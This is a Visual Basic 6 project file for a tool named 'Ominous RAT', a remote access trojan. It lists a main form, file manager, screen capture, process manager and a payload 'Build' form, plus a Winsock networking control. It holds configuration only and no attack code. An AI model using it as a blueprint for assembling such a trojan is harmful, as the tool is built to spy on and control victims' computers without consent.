Type=Exe
Form=Forms\frmMain.frm
Reference=*\G{00020430-0000-0000-C000-000000000046}#2.0#0#..\..\..\..\..\WINDOWS\system32\stdole2.tlb#OLE Automation
Object={831FDD16-0C5C-11D2-A9FC-0000F8754DA1}#2.0#0; MSCOMCTL.OCX
Object={248DD890-BB45-11CF-9ABC-0080C7E7B78D}#1.0#0; MSWINSCK.OCX
Object={F9043C88-F6F2-101A-A3C9-08002B2F49FB}#1.2#0; COMDLG32.OCX
Form=Forms\frmFileManager.frm
Form=Forms\frmScreenCapture.frm
Form=Forms\frmProcessManager.frm
Object={BD0C1912-66C3-49CC-8B12-7B347BF6C846}#12.1#0; COC8FC~1.OCX
Form=Forms\frmBuild.frm
Form=Forms\frmAbout.frm
ResFile32="Resources\prjOMRAT.RES"
IconForm="frmMain"
Startup="frmMain"
ExeName32="Ominous RAT.exe"
Path32=".."
Command32=""
Name="prjOMRAT"
HelpContextID="0"
CompatibleMode="0"
MajorVer=1
MinorVer=0
RevisionVer=0
AutoIncrementVer=0
ServerSupportFiles=0
VersionCompanyName="CtrlAltDestroy"
CompilationType=0
OptimizationType=0
FavorPentiumPro(tm)=0
CodeViewDebugInfo=0
NoAliasing=0
BoundsCheck=0
OverflowCheck=0
FlPointCheck=0
FDIVCheck=0
UnroundedFP=0
StartMode=0
Unattended=0
Retained=0
ThreadPerObject=0
MaxNumberOfThreads=1

[MS Transaction Server]
AutoRefresh=1
